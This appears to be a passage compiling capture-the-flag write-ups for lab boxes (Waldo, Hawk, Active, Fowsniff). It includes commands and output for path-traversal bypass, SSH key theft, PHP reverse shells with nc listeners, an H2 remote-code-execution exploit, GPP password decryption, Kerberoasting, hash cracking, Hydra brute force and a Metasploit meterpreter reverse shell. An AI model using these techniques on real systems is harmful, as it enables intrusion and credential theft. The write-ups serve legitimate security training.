Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 c4:ff:81:aa:ac:df:66:9e:da:e1:c8:78:00:ab:32:9e (RSA)
| 256 b3:e7:54:6a:16:bd:c9:29:1f:4a:8c:cd:4c:01:24:27 (ECDSA)
|_ 256 38:64:ac:57:56:44:d5:69:de:74:a8:88:dc:a0:b4:fd (ED25519)
80/tcp open http nginx 1.12.2
|_http-server-header: nginx/1.12.2
| http-title: List Manager
|_Requested resource was /list.html
|_http-trane-info: Problem with XML parsing of /evox/about
8888/tcp filtered sun-answerbook

[/bash]

We got HTTP (80), SSH (22) and some weird sun-answerbook port (8888). Lets try browsing the site.

Looks like we need to find Waldo :). I initially got stuck here. Nothing seemed to work in terms of php, traversal’s, etc. Using Burp, I found out that there are 4 command’s that are issued on the site:

1. fileRead

2. fileWirte

3. fileDelete

4. dirRead

I really like this challenge, because I needed to start using Burp in ways I hadn’t before, as noted above. I then proceeded to look into what fileRead.php actually does:

K, so it reads files. No surprise there. Let’s see what happens if I use it to read the file itself:

Now I understand why the dir traversal didn’t work! The .php has a string that replaces …/ with ..\ and/or some other stuff.

[bash]

$_POST[‘file’] = str_replace( array(\"..\/\", \"..\\\"\"), \"\", $_POST[‘file’]);

[/bash]

Nifety! But not something you can work around with by using ….// instead of ..//. With ….//, one of the ../ be replaced, leaving just ../. See below!

Error… Now replace the ../ with ….//

Remote code execution! Awesome! Let’s see what we can do if we use the dirRead.php instead of fileRead.php

Cool, using this command I’ve did some reconnaisance of the box. I found that there is directory called .dockerenv, which must mean that the site is running in a Docker container.

On the the folder with the authorized keys. The .monitor file looks really interesting.

 Make sure to replace the \n, because they are actually invalid chars through the script. We have a .ssh key. Let’s see what we can do with it.

[bash]

ssh -i monitor nobody@10.10.10.87
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See &amp;amp;amp;lt;http://wiki.alpinelinux.org&amp;amp;amp;gt;.
waldo:~$ whoami
nobody

[/bash]

Exploitation

This is actually where I got stuck for a while. There are no strange services running, no sticky bits, no weird users, nothing. Then I realized that I am in Docker container. Maybe I can just use the key to login the localhost:

Hello Waldo!

Privilege escalation

Next up is to enumerate again. But first I need a shell I can use without restrictions. You can use -t to:

Force pseudo-terminal allocation. This can be used to execute
arbitrary screen-based programs on a remote machine, which can be
very useful, e.g. when implementing menu services. Multiple -t
options force tty allocation, even if ssh has no local tty.

So lets see if we can get an bash shell with this:

[bash]

waldo:~$ ssh -i .ssh/.monitor monitor@localhost -t bash
monitor@waldo:~$

[/bash]

And again, I got stuck for quite a while after that. I’ve then send over LinEnum as described in the Hawk write-up. Initially it didn’t show up anything, until I ran the thorough version. After talking to some friends and colleagues, one of them pointed me at capabilities of files. I’ve honestly never heard of this up until that moment. However, this does not work out of the box with the shell I’ve got. I need to define all the PATH’s.

[bash]

export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATH

[/bash]

Most interesting part of the LinEnum.sh now is:

[bash]

-e [+] Files with POSIX capabilities set:
/usr/bin/tac = cap_dac_read_search+ei
/home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+ei

[/bash]

After looking into tac,it seemed that I could use it to open root.txt.

[bash]

monitor@waldo:/tmp$ /usr/bin/tac /root/root.txt

8fb67c84418be6e45fbd348fd4584f

[/bash]

Finally! Man, this was a hard box :). Learned so much, this is why I am doing these CTF’s.

ippsec video on this box

This box requires you to fumble around with SSL and .enc files. Takes some bruteforcing and luck…

Enumeration

Nmap ftw.

[bash]

nmap -sC -sV -o- -oA initial 10.10.10.102

Nmap 7.70 scan initiated Wed Jul 18 18:42:26 2018 as: nmap -sC -sV -p- -oA inital 10.10.10.102
Nmap scan report for 10.10.10.102
Host is up (0.030s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Jun 16 22:21 messages
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.23
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 – secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e4:0c:cb:c5:a5:91:78:ea:54:96:af:4d:03:e4:fc:88 (RSA)
| 256 95:cb:f8:c7:35:5e:af:a9:44:8b:17:59:4d:db:5a:df (ECDSA)
|_ 256 4a:0b:2e:f7:1d:99:bc:c7:d3:0b:91:53:b9:3b:e2:79 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome to 192.168.56.103 | 192.168.56.103
5435/tcp open tcpwrapped
8082/tcp open http H2 database http console
|_http-title: H2 Console
9092/tcp open XmlIpcRegSvc?

[/bash]

So we have HTTP (80), SSH (22), FTP (21), HTTP H2 database (8082) and some random stuff (5435, 9092). Lets start by browsing the FTP port.

[bash]

ftp 10.10.10.102
Connected to 10.10.10.102.
220 (vsFTPd 3.0.3)
Name (10.10.10.102:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&amp;amp;gt; ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jun 16 22:21 messages
226 Directory send OK.
ftp&amp;amp;gt; cd messages
250 Directory successfully changed.
ftp&amp;amp;gt; ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp&amp;amp;gt; ls -lhra
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r–r– 1 ftp ftp 240 Jun 16 22:21 .drupal.txt.enc
drwxr-xr-x 3 ftp ftp 4096 Jun 16 22:14 ..
drwxr-xr-x 2 ftp ftp 4096 Jun 16 22:21 .
226 Directory send OK.
ftp&amp;amp;gt; get .drupal.txt.enc
local: .drupal.txt.enc remote: .drupal.txt.enc
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .drupal.txt.enc (240 bytes).
226 Transfer complete.
240 bytes received in 0.00 secs (1.4486 MB/s)
ftp&amp;amp;gt; exit
221 Goodbye.

[/bash]

What you see above is that I connected to the FTP server, logged in anonymously. the initial ls command didn’t show anything, but using ls -lhra (including showing hidden files) shows a hidden file (recognizable by the .) called .drupal.txt.enc.

A file with .enc extension means that the file is encrypted. You can verify this with the file command:

[bash]

file drupal.txt.enc
drupal.txt.enc: openssl enc’d data with salted password, base64 encoded

[/bash]

Lets use base64 to decode the content.

[bash]

base64 -d drupal.txt.enc &amp;gt; drupal.txt.decoded

[/bash]

After reading up on (SSL) encryption through this link, I decided to use bruteforce-salted-openssl with the rockyou wordlist. I guess I got lucky here and selected the correct cipher (AES-256-CBC) and digest (SHA256) for for decryption.

[bash]

bruteforce-salted-openssl -v 10 -t 6 -f /usr/share/wordlists/rockyou.txt -d sha256 ciphertext
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.

Tried passwords: 31
Tried passwords per second: inf
Last tried password: pretty

Password candidate: friends
Tried passwords: 6255562
Tried passwords per second: 625556.200000
Last tried password: lester2411

Tried passwords: 13280069
Tried passwords per second: 664003.450000
Last tried password: 13413011

[/bash]

Lets use the ‘friends’ password to decrypt the file

[bash]

openssl aes-256-cbc -d -in drupal.txt.decoded -out login.txt -k friends
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.

cat login.txt

Daniel,

Following the password for the portal:

[P]encilKeyboardScanner123

Please let us know when the portal is ready.

Kind Regards,

IT department

[/bash]

So we have the password for the drupal site.  Password = [P]encilKeyboardScanner123. Lets start exploiting the Drupal site.

Exploitation

I’ve tried logging into the site with the username ‘admin’ and the aforementioned password. And voila, I was logged in.

Whenever I encounter a CMS system like this, I will try to get a php reverse shell, since most of these systems support php. However, on Drupal you need to enable this since it is not enabled my default. Just to be certain, I also run droopescan to see if any vulnerabilities show up. I did  an unauthenticated scan, just to see what came back.

[bash]

droopescan scan -u 10.10.10.102
[+] Site identified as drupal.
[+] Themes found:
seven http://10.10.10.102/themes/seven/
garland http://10.10.10.102/themes/garland/

[+] Possible interesting urls found:
Default changelog file – http://10.10.10.102/CHANGELOG.txt
Default admin – http://10.10.10.102/user/login

[+] Possible version(s):
7.58

[+] Plugins found:
image http://10.10.10.102/modules/image/
profile http://10.10.10.102/modules/profile/
php http://10.10.10.102/modules/php/

[/bash]

Version 7.58 is not vulnerable to Drupalgeddon2 and nothing really stands out. So let’s continue down the PHP path. Enable php filter through the modules page.

I have good experiences with the laudanum  php reverse shell, which is the one created by pentest monkey. Laudanum should be in most pentesting distro’s (at least Kali and Parrot), use locate to find it:

[bash]

locate shell | grep php

*Snip*<br data-mce-bogus="1">

/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/php/shell.php

[/bash]

Copy paste the content op php-reverse-shell.php into a new article. Set the format tot PHP code. Don’t forget to edit the IP and port field. Press add or preview when done and…

[bash]

nc -lnvp 8082
listening on [any] 8082 …
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.102] 36426
Linux hawk 4.15.0-23-generic #25-Ubuntu SMP Wed May 23 18:02:16 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
12:39:36 up 5 days, 14:13, 0 users, load average: 0.00, 0.00, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off

$ whoami
www-data
[/bash]

Browse to /home/daniel/user.txt for the user flag.

Privilege Escalation

I order to do some additional enumeration on the box, I pulled in LinEnum.sh and ran it from /tmp. I did this by running a simple HTTP server on my machine and using wget on the Hawk machine to pull the script in.

On my machine, in the folder in which LinEnum.sh is located:

[bash]

python -m SimpleHTTPServer 8081

[/bash]

On the Hawk machine, I wentto /tmp so I have a place to write files to and then:

[bash]

wget ipofmymachine:8081/LinEnum.sh

[/bash]

After running LinEnum.sh, I saw the following result:

[bash]

root 818 0.0 0.0 4628 864 ? Ss Dec09 0:00 /bin/sh -c /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar
root 819 0.1 4.9 2329256 49160 ? Sl Dec09 9:22 /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar

[/bash]

This looks like the H2 database that is running on port 8082. It seems like the proces is running as root. That’s interesting. It even specifies the version. Let’s look into searchsploit:

[bash]

searchsploit H2 Database

*SNIP*<br data-mce-bogus="1">

H2 Database – ‘Alias’ Arbitrary Code Execution | exploits/java/local/44422.py
H2 Database 1.4.196 – Remote Code Execution | exploits/java/webapps/45506.py
H2 Database 1.4.197 – Information Disclosure | exploits/linux/webapps/45105.py
[/bash]

Ah yes, remote code execution. Sounds like the thing we need. I just copied the contents of that file into exploit.py. Then I used the wget method as noted above to copy the file to Hawk. Execute to get:

[bash]

www-data@hawk:/tmp$ python3 exploit.py -H 127.0.0.1:8082
python3 exploit.py -H 127.0.0.1:8082
[*] Attempting to create database
[+] Created database and logged in
[*] Sending stage 1
[+] Shell succeeded – ^c or quit to exit

h2-shell$ whoami
root

h2-shell$

[/bash]

Done!

As always, excellent video by ippsec on this box.

I had so much fun with this recently retired box. My skill set with Active Directory was lacking, so this was quite a learning experience!

Enumeration

Nmap baby, Nmap:

[bash]

nmap -sC -sV -p- -oA initial 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-02 18:13 UTC
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1m18s, deviation: 0s, median: -1m18s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2018-08-02 18:13:42
|_ start_date: 2018-08-02 09:21:01

[/bash]

Wow, thats a lot of ports. From the inital scan, we can safely say that we are dealing with a Windows machine here. A couple of ports stand out: DNS (53), Samba (445), RPC (all over the place). I initially ran enum4linux on the box to explore the Samba shares, but found the smbmap tool while writing this post which gives a much more clear view of the situation:

[bash]

smbmap -H 10.10.10.100
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.100…
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
—- ———–
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON NO ACCESS
Replication READ ONLY
SYSVOL NO ACCESS
Users NO ACCESS

[/bash]

Let’s fire up smbclient to access the Replication share. Just press enter to login anonymously.

[bash]

smbclient //10.10.10.100/Replication
Unable to initialize messaging context
Enter WORKGROUP\user’s password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \&amp;gt;

[/bash]

Cool, that worked. Instead of going through all the directories on this share, I ran smbmap again, but this time the -R argument to list all directories. See what I found:

[bash]

smbmap -H 10.10.10.100 -R
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.100…
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
—- ———–
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON NO ACCESS
Replication READ ONLY
.\
dr–r–r– 0 Sat Jul 21 10:37:44 2018 .
dr–r–r– 0 Sat Jul 21 10:37:44 2018 ..
dr–r–r– 0 Sat Jul 21 10:37:44 2018 active.htb

*** Snip***

.\\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
dr–r–r– 0 Sat Jul 21 10:37:44 2018 .
dr–r–r– 0 Sat Jul 21 10:37:44 2018 ..
-r–r–r– 533 Sat Jul 21 10:38:11 2018 Groups.xml

[/bash]

Ah, the infamous Groups.xml. From this excellent blog post:

Group policy preferences allows domain admins to create and deploy across the domain local users and local administrators accounts. This feature was introduced in Windows 2008 Server however it can be abused by an attacker since the credentials of these accounts are stored encrypted and the public key is published by Microsoft. This leaves the door open to any user to retrieve these files and decrypt the passwords stored in order to elevate access.

These files are stored in a shared directory in the domain controller and any authenticated user in the domain has read access to these files since it is needed in order to obtain group policy updates.

The contents of Groups.xml is the following:

[bash]

&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"&amp;gt;&amp;lt;User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"&amp;gt;&amp;lt;Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/&amp;gt;&amp;lt;/User&amp;gt;
&amp;lt;/Groups&amp;gt;

[/bash]

So we see 3 key values here:

1. The domain (active.htb)
2. Username (SVC_TGS)
3. And the actual value (cpassword)

The stored value can be decrypted using either a Metasploit module, PowerSploit module or this tool I used called Gpprefdecrypt.py I’ve edited the hash and password a bit to prevent to usual Google-fu.

[bash]

python Gpprefdecrypt.py [e]dBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

[G]PPstillStandingStrong2k18

[/bash]

Exploitation

I switched to the Impacket toolset, based on the Kerberoasting posts I’ve found as noted on the tools page.

[bash]

python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.9.18-dev – Copyright 2002-2018 Core Security Technologies

Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
——————– ————- ——————————————————– ——————- ——————-
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 19:06:40 2018-07-30 17:17:40

$[k]rb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$93a0a6cf83fa8e765bacccf1ea177432$b910699f5f73c858e8300ed38048b5fb0e7cfcadaef468c7fc8f80b41858e444c7586cde377debef18c50f6a9f13857887b31c808e7af81282a4eddbfb1da2610591908db563fb202762e28eb6f0157f70b8aa98dd53d694276ef0f126b896e543e2812b4b27461af3e791b7c4dcb245241a2706df6ae19da51750c470cdd010675d1d0ccba4e5ef5f656f230837f1e03b6eb6cf413559df7f8c11ae7dab8118bc1e99c7ebc1c2c4b7ff6f5b9ae04cd3f5013dcd21b4c34cc68a6cf56198a001adb38e847d9fde80b6d52b7f4357f59dc2e2f0af0f29e27dd20934f90c330e22d96c109d4071d712d20bc9274cc52b0ce56b3f0ed5176fc39edc1a9bbbae78cad6a9b6e6b53b211188e591ae49e5147d27593ed27e3a0ce4bee9fce01b73296dfa1026980f6b5047c31c9a494272d9a5f9de5f0634202ab44fc476844eaa9fe89ac1a393075635d111b5ec9ffd3399769e7d1f401071786b00639d132726dc83af898c93ac7c1cfcc2da92a506cc50040f36e5607cc70e731c13c9e6a2d3419e6b43a855922bde75d45f5ee9083728c828bb75dcfde9b84fb27d80b5661648db357c10e8ddd28c29f035cef9722c8906cc5dbd09d0614a28fe4bcde476532a7b868cea09d270cdfe9df2ba11330519463bbfbaa074d900376bfcb277fd92a61a2b3c598d8b3d6f45f23642161e3a37af70bcde771823a72e356c0116ad5da190380f1e0a07816eb680d404e468e46a5ac64a7a631d4dd85520357b3d190ca10d09d12635d12360b89787f7ab607287c7f243ec70f98fd9b05325745a91d25de64fdfdaf0ec72226c17f8a990a0465d84c7750213f36efaf7087b1f293b29cabd26abb7101d06865fa307a0ce39a2a80f294a485174564d3928d4920e07e6a44b0ac22d4f181d42c0c6baec02554f6995d2031160f9cc6d3819dbbb263be35de395951b27ed1d0ccf73e3724a0a7606ec8f5f5e84a47b4da508d277aa1967ef66c057cb031a4a06f8a3709f6ee2c2043316c2bcdd4740c685028eab2878d07edb164346bbfe3166680cac8c6d96c480dd6cf2c7d0a04f4d889ef26a887124ae28d28c709811f8f45a9f31d1f4aa77c2cc4311b76e54dd83a927d175dc91e34971528c2365175ef8d19db024f6b997901424da839c6b86df032a2db7841c69e40a3448dbcfc13b9aa51127d8f59605d35ac16fb9967ecaf9fbb011c979c8d30b62a6f08131f5fd3672fedbcf4f53e04ebe954841b32f6796c2a719

[/bash]

What we have here is the hash of the Kerberos ticket for the administrator account. With the Kerberos hash in place, I can start cracking it with Hashcat. I’ve put the hash into a file named administrator_hash.txt, use rockyou.txt as a wordlist and use –force to override some errors what I got:

[bash]

hashcat -m 13100 -a 0 administrator_hash.txt /usr/share/wordlists/rockyou.txt –force

**Cracking***

Output =&nbsp;T[i]cketmaster1968

[/bash]

There we have the administrator password. Nice.

Privilege escalation

Finally, you can use psexec.py from the Impacket package to pass the cracked hash to the server to login. Or just login with smbclient using administrator and the cracked hash. I opted for the Metasploit module in this case, with a reverse TCP shell:

[bash]

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST 10.10.10.100 yes The target address
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,…) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass Ticketmaster1968 no The password for the specified username
SMBUser Administrator no The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique (Accepted: ”, seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 443 yes The listen port

Exploit target:

Id Name
— —-
0 Automatic

[/bash]

If all goes well, you will spawn a shell at the box as SYSTEM. Simply go to the desktop of the administrator for the root flag. You can even get the user flag from the user desktop.

[bash]

[*] Started reverse TCP handler on 10.10.14.10:443
[*] 10.10.10.100:445 – Connecting to the server…
[*] 10.10.10.100:445 – Authenticating to 10.10.10.100:445 as user ‘Administrator’…
[*] 10.10.10.100:445 – Selecting PowerShell target
[*] 10.10.10.100:445 – Executing the payload…
[+] 10.10.10.100:445 – Service start timed out, OK if running a command or non-service executable…
[*] Sending stage (179779 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.14.10:443 -&gt; 10.10.10.100:63354) at 2018-12-11 01:55:49 +0000

meterpreter &gt; shell
Process 2000 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
whoami
nt authority\system

[/bash]

Psexec output as well:

[bash]

/psexec.py -target-ip 10.10.10.100 administrator@active.htb
Impacket v0.9.18-dev – Copyright 2002-2018 Core Security Technologies

Password:
[*] Requesting shares on 10.10.10.100…..
[*] Found writable share ADMIN$
[*] Uploading file GtlPZcTM.exe
[*] Opening SVCManager on 10.10.10.100…..
[*] Creating service OAuq on 10.10.10.100…..
[*] Starting service OAuq…..
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
nt authority\system

[/bash]

And as always, the Ippsec video on this box.

Finally had time to do another Vulnhub machine. Fowsniff looked fun and a friend of mine recommended it due to the Twitter component, so lets get started!

Enumeration

As always, lets start with an nmap:

[bash]

nmap -sC -sV -p- -oA initial 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-05 20:36 CET
Nmap scan report for 192.168.56.101
Host is up (0.00030s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
| 256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_ 256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp – Delivering Solutions
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL RESP-CODES PIPELINING AUTH-RESP-CODE USER SASL(PLAIN) TOP CAPA
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 LOGIN-REFERRALS OK ENABLE AUTH=PLAINA0001 have listed post-login SASL-IR IDLE Pre-login capabilities more LITERAL+ ID
MAC Address: 08:00:27:92:B1:9E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

[/bash]

So we have HTTP (80), SSH (22) and POP3 (110). Browsing the site indicates that Fowsniff sites has been compromised and points towards Twitter. Searching for Fowsniff on Twitter leads to the following tweets on https://twitter.com/fowsniffcorp

Seems like they have their passwords leaked. The even give a specific one:

Visiting the pastebin link referred to by the first link on https://pastebin.com/raw/NrAqVeeX leads to the output noted below. I’ve made some changes to the usernames and hashes to prevent Google-fu 🙂

[bash]

FOWSNIFF CORP PASSWORD LEAK
”~“
( o o )
+—–.oooO–(_)–Oooo.——+
| |
| FOWSNIFF |
| got |
| PWN3D!!! |
| |
| .oooO |
| ( ) Oooo. |
+———\ (—-( )——-+
\_) ) /
(_/
FowSniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!

*auer@fowsniff:[8]a28a94a588a95b80163709ab4313aa4
*ustikka@fowsniff:[a]e1644dac5b77c0cf51e0d26ad6d7e56
*egel@fowsniff:[1]dc352435fecca338acfd4be10984009
*aksteen@fowsniff:[1]9f5af754c31f1e2651edde9250d69bb
*eina@fowsniff:[9]0dc16d47114aa13671c697fd506cf26
*tone@fowsniff:[a]92b8a29ef1183192e3d35187e0cfabd
*ursten@fowsniff:[0]e9588cb62f4b6f27e33d449e2ba0b3b
*arede@fowsniff:[4]d6e42f56e127803285a0a7649b5ab11
*ciana@fowsniff:[f]7fd98d380735e859f8b2ffbbede5a7e

Fowsniff Corporation Passwords LEAKED!
FOWSNIFF CORP PASSWORD DUMP!

Here are their email passwords dumped from their databases.
They left their pop3 server WIDE OPEN, too!

MD5 is insecure, so you shouldn’t have trouble cracking them but I was too lazy haha =P

l8r n00bz!

B1gN1nj4

————————————————————————————————-
This list is entirely fictional and is part of a Capture the Flag educational challenge.

All information contained within is invented solely for this purpose and does not correspond
to any real persons or organizations.

Any similarities to actual people or entities is purely coincidental and occurred accidentally.

[/bash]

Okay, so their passwords were dumped in MD5 format. Lets get cracking!

Exploitation

I’ve used hashcat to crack these hashes. I’ve put all the hashes in a file named hashes and used rockyou.txt to have a crack at them. I’ve replaced the initial character with a * and passwords have a [] at the beginning because I don’t want everyone to stumble into the solution using Google.

[bash]

hashcat -m 0 passwords /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt –force
hashcat (v5.0.0) starting…

Dictionary cache building /usr/share/wordlists/SecLists/Passwords/Leaked-DatabasDictionary cache building /usr/share/wordlists/SecLists/Passwords/Leaked-DatabasDictionary cache building /usr/share/wordlists/SecLists/Passwords/Leaked-DatabasDictionary cache building /usr/share/wordlists/SecLists/Passwords/Leaked-DatabasDictionary cache built:
* Filename..: /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344391
* Bytes…..: 139921497
* Keyspace..: 14344384
* Runtime…: 4 secs

*0dc16d47114aa13671c697fd506cf26:[s]coobydoo2
*d6e42f56e127803285a0a7649b5ab11:[o]rlando12
*dc352435fecca338acfd4be10984009:[a]pples01
*9f5af754c31f1e2651edde9250d69bb:[s]kyler22
*a28a94a588a95b80163709ab4313aa4:[m]ailcall
*7fd98d380735e859f8b2ffbbede5a7e:[0]7011972
*e9588cb62f4b6f27e33d449e2ba0b3b:[c]arp4ever
*e1644dac5b77c0cf51e0d26ad6d7e56:[b]ilbo101
[/bash]

I got 8 out of 9. Nice! I then used Hydra to see which username lines up with which password for the pop3 port, before moving to SSH. I’ve put all the usernames in the usernames file and passwords in a file named passwords.

[bash]

hydra -L usernames -P passwords -e nsr pop3://192.168.56.101

sudo hydra -L usernames -P passwords -e nsr pop3://192.168.56.101 -v
Hydra v8.6 (c) 2017 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-05 21:38:33
[INFO] several providers have implemented cracking protection, check with a small wordlist first – and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 99 login tries (l:9/p:11), ~7 tries per task
[DATA] attacking pop3://192.168.56.101:110/
[VERBOSE] Resolving addresses … [VERBOSE] resolving done
[VERBOSE] CAPABILITY: +OK
CAPA
TOP
UIDL
RESP-CODES
PIPELINING
AUTH-RESP-CODE
USER
SASL PLAIN
.
[VERBOSE] using POP3 PLAIN AUTH mechanism
[110][pop3] host: 192.168.56.101 login: [s]eina password: [s]coobydoo2
[STATUS] attack finished for 192.168.56.101 (waiting for children to complete tests)
[STATUS] 99.00 tries/min, 99 tries in 00:01h, 1 to do in 00:01h, 12 active
1 of 1 target successfully completed, 1 valid password found
[/bash]

Let’s login to the POP3 and see what goodies await:

[bash]

nc 192.168.56.101 110
+OK Welcome to the Fowsniff Corporate Mail Server!
USER [s]eina
+OK
PASS [s]coobydoo2
+OK Logged in.
LIST
+OK 2 messages:
1 1622
2 1280

Return-Path: <[s]tone@fowsniff>
X-Original-To: [s]eina@fowsniff
